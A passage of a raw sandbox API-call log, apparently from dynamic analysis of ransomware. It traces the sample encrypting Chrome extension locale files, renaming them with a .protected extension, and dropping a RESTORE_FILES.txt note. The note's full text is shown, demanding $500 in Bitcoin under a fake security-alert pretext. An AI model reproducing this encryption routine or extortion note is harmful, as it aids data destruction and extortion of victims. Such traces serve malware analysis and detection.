hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.718] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.718] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.718] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.718] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.719] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.719] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.719] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.719] CloseHandle (hObject=0x168) returned 1 [0079.719] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.protected") returned 167 [0079.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.protected")) returned 1 [0079.719] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.720] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\RESTORE_FILES.txt") returned 161 [0079.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.720] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.720] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.720] lstrlenA (lpString="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") returned 684 [0079.721] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.721] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.721] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.721] CloseHandle (hObject=0x164) returned 1 [0079.721] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.721] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0079.721] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0079.721] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0079.721] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0079.721] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0079.721] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da") returned 143 [0079.721] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0079.721] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0079.721] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*") returned 145 [0079.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.721] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.721] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.721] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.721] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.721] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.721] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\.") returned 145 [0079.721] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.721] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.721] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.721] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.721] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.721] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.721] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.721] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\..") returned 146 [0079.721] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.721] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.721] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.721] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.722] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.722] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.722] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.722] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.722] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.723] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.723] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.723] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.723] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.723] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.723] CloseHandle (hObject=0x168) returned 1 [0079.723] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.protected") returned 167 [0079.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.protected")) returned 1 [0079.724] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.724] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.724] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\RESTORE_FILES.txt") returned 161 [0079.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.725] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.725] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.725] lstrlenA (lpString="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") returned 684 [0079.725] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.725] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.725] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.726] CloseHandle (hObject=0x164) returned 1 [0079.726] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.726] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0079.726] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0079.726] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0079.726] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0079.726] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0079.726] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de") returned 143 [0079.726] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0079.726] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0079.726] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*") returned 145 [0079.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.726] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.726] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.726] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.726] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.726] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.726] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\.") returned 145 [0079.727] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.727] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.727] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.727] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.727] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.727] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.727] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.727] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\..") returned 146 [0079.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.727] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.727] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.727] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.727] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.727] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.727] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.728] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.728] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.728] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, 